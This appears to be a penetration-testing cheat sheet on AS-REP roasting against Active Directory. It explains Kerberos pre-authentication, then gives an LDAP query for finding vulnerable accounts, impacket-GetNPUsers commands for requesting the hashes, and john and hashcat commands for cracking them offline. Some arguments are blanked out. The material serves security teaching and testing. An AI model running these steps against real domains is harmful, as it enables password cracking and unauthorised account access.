# AS-REP Roast ## Theory `AS-REP` roasting is an attack that is often-overlooked in my opinion it is not extremely common as you have to explicitly set `Accounts Does not Require Pre-Authentication` aka `DONT_REQ_PREAUTH` `Pre-Authentication` is the first step in Kerberos Authentication and it’s main role is to try prevent against brute-force password guessing attacks. Typcially during Pre-Auth a user will enter his creds which will be used to encrypt a time stamp and the DC will decrypt it to validate that the correct creds were used. If the DC verifies okay it will issue a `TGT` however if `Pre-Authentication` is disabled it would allow an attacker to request a ticket for any user and the `DC` would simply return a `TGT` which will be encrypted similar to the `Kerberoast` attack which can be cracked offline. `AS-REP` is cool as you don’t even have to do it from a **Domain-Joined Machine** or `Domain-User` you just have to have access to request to the `KDC` however being on a **Domain-Joined Machine** or having Domain Creds will make the enumeration process way easier as you can simply use LDAP Filter or PowerView to find targets. Such as: ```powershell Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name ``` ## Request AS\_REP Message If you have a credential: ```shell impacket-GetNPUsers '\:' -dc-ip ``` If you don't have a credential: ```shell impacket-GetNPUsers / -usersfile usernames.txt -outputfile hash.txt ``` Note that the `/` in `/` is required, otherwise GetNPUsers won't recongize that string as a domain ## TGT Cracking Crack the TGT ticket with John: ```shell john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast ``` Or with hashcat: ```shell hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt ``` ## Reference {% embed url="" %} How To Attack Kerberos 101 - m0chan {% endembed %}